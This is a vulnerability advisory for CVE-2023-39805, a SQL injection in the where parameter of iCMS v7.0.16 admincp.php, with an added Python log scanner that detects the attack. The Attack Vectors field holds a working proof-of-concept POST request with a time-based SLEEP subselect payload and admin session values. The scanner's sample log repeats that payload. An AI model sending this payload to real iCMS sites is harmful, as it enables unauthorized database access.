CVE-2023-39805
iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the where parameter at admincp.php.
[CVE-ID]
CVE-2023-39805
------------------------------------------
[Description]
iCMS v7.0.16 was discovered to contain a SQL injection vulnerability
via the where parameter at admincp.php.
------------------------------------------
[Vulnerability Type]
SQL Injection
------------------------------------------
[Vendor of Product]
icmsdev
------------------------------------------
[Affected Product Code Base]
icms V7.0.16 - V7.0.16
------------------------------------------
[Affected Component]
icms<=V7.0.16
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq_XXz5vaYOwEoS_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1
Cookie: iCMS_ADMIN_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC_CewgaX5uR1iNHfEz_Pj20qTaPC_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG_SESSION=11807
field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))testsql)
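A log-review check for this vector, added here as an example and not part of iCMS or the advisory: it parses "METHOD PATH BODY" request lines (a constructed log format) and flags POSTs to admincp.php?app=database&do=query whose where parameter carries time-based functions or a subselect, which is what the PoC body above relies on.

```python
"""Flag time-based blind SQLi attempts against the iCMS admincp.php
database-query endpoint (CVE-2023-39805). Added example; the log line
format 'METHOD PATH BODY' is a constructed assumption."""
import re
from urllib.parse import parse_qs, urlsplit, unquote_plus

# Indicators of time-based blind injection inside a WHERE clause.
TIME_BASED = re.compile(
    r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.IGNORECASE)
SUBSELECT = re.compile(r"\(\s*SELECT\b", re.IGNORECASE)

def is_database_query(path: str) -> bool:
    """True for admincp.php?app=database&do=query requests."""
    parts = urlsplit(path)
    if not parts.path.endswith("/admincp.php"):
        return False
    q = parse_qs(parts.query)
    return q.get("app") == ["database"] and q.get("do") == ["query"]

def inspect_request(method: str, path: str, body: str):
    """Return a finding for a suspicious 'where' value, else None."""
    if method.upper() != "POST" or not is_database_query(path):
        return None
    where = parse_qs(body).get("where", [""])[0]  # parse_qs decodes '+' and %xx
    where = unquote_plus(where)                    # also catch double-encoding
    indicators = []
    if TIME_BASED.search(where):
        indicators.append("time-based function")
    if SUBSELECT.search(where):
        indicators.append("subselect")
    if not indicators:
        return None
    return {"param": "where", "value": where, "indicators": indicators}

def scan_log(lines):
    """Scan 'METHOD PATH BODY' lines; return [(line_no, finding), ...]."""
    findings = []
    for n, line in enumerate(lines, 1):
        try:
            method, path, body = line.split(" ", 2)
        except ValueError:
            continue  # malformed line, skip
        finding = inspect_request(method, path, body)
        if finding:
            findings.append((n, finding))
    return findings

# Constructed sample log; line 2 carries the advisory's PoC body.
SAMPLE_LOG = [
    "POST /icms/admincp.php?app=database&do=query&frame=iPHP field=tkd&pattern=a&replacement=b&where=where+id%3D1",
    "POST /icms/admincp.php?app=database&do=query&frame=iPHP field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))testsql)",
    "GET /icms/admincp.php?app=database&do=query ",
]
```

Running `scan_log(SAMPLE_LOG)` reports only line 2, with both the time-based function and the subselect noted.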
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
chubby
------------------------------------------
[Reference]
http://icms.com
http://icmsdev.com